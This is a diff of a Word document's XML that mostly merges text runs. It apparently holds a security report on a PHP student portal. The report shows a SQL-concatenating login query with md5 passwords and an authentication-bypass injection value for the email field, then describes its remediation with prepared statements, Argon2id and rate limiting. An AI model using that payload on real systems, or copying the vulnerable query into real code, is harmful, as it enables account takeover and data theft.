-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> "'";</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>$result = $conn-&gt;query($</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>sql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>);</w:t>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>$sql = "SELECT * FROM users WHERE email = '$identifier' AND password = '" . md5($password) . "'";</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>$result = $conn-&gt;query($sql);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2765,58 +2399,12 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">An identifier value </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">of  </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>admin@example.test</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">' -- (with a trailing space)  closes the quoted string early and comments out the rest of the query, including the password check entirely — authenticating as </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>admin@example.test</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> with no valid password at all. The same pattern permits UNION-based data exfiltration through other injectable fields (see 4.3).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:t>An identifier value of  admin@example.test' -- (with a trailing space)  closes the quoted string early and comments out the rest of the query, including the password check entirely — authenticating as admin@example.test with no valid password at all. The same pattern permits UNION-based data exfiltration through other injectable fields (see 4.3).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -2833,34 +2421,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Every database call in the hardened application goes through a single wrapper, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Database::</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>run(), which prepares the statement and binds parameters using PDO with client-side emulation disabled:</w:t>
+        <w:t>Every database call in the hardened application goes through a single wrapper, Database::run(), which prepares the statement and binds parameters using PDO with client-side emulation disabled:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -2871,87 +2441,30 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>self::</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>$instance = new PDO($</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>dsn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>, $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>db</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>['user'], $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>db</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>['pass'], [</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>self::$instance = new PDO($dsn, $db['user'], $db['pass'], [</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">    PDO::ATTR_ERRMODE            =&gt; PDO::ERRMODE_EXCEPTION,</w:t>
       </w:r>
       <w:r>
@@ -2960,7 +2473,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">    PDO::ATTR_DEFAULT_FETCH_MODE =&gt; PDO::FETCH_ASSOC,</w:t>
       </w:r>
       <w:r>
@@ -2969,7 +2489,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">    PDO::ATTR_EMULATE_PREPARES   =&gt; false,</w:t>
       </w:r>
       <w:r>
@@ -2978,7 +2505,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t>]);</w:t>
       </w:r>
     </w:p>
@@ -2998,10 +2532,10 @@
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -3012,197 +2546,78 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-        <w:t>$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>stmt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>Database::</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>run(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">    'SELECT id, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>matric_no</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, email, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>password_hash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>full_name</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, role, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>is_active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">     FROM users WHERE email = ? OR </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>matric_no</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>= ?</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> LIMIT 1',</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">   [</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>$identifier, $identifier]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>$stmt = Database::run(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    'SELECT id, matric_no, email, password_hash, full_name, role, is_active</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">     FROM users WHERE email = ? OR matric_no = ? LIMIT 1',</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    [$identifier, $identifier]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t>);</w:t>
       </w:r>
     </w:p>
@@ -3216,48 +2631,12 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">The same pattern is used for the admin student search (Section 5.4), course enrolment, profile updates, and every other query in the codebase — there is no method anywhere in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Database.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> that accepts raw, user-influenced SQL text.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:t>The same pattern is used for the admin student search (Section 5.4), course enrolment, profile updates, and every other query in the codebase — there is no method anywhere in src/Database.php that accepts raw, user-influenced SQL text.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -3279,10 +2658,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -3297,10 +2676,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -3315,10 +2694,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -3333,10 +2712,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -3351,11 +2730,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>4.4 Remediation: Argon2id, Rate Limiting, Lockout, and Session Regeneration</w:t>
       </w:r>
     </w:p>
@@ -3375,10 +2753,10 @@
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -3389,106 +2767,62 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">return </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>password_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>hash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>$password, PASSWORD_ARGON2ID, [</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">    '</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>memory_cost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>' =&gt; 65536, // 64 MB</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">    '</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>time_cost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>'   =&gt; 4,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>return password_hash($password, PASSWORD_ARGON2ID, [</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    'memory_cost' =&gt; 65536, // 64 MB</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    'time_cost'   =&gt; 4,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">    'threads'     =&gt; 1,</w:t>
       </w:r>
       <w:r>
@@ -3497,7 +2831,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t>]);</w:t>
       </w:r>
     </w:p>
@@ -3511,52 +2852,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Login attempts are rate-limited per identifier and per IP address (maximum 5 failed attempts in a 15-minute window), after which the account enters a 15-minute temporary lockout recorded in the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>account_lockouts</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
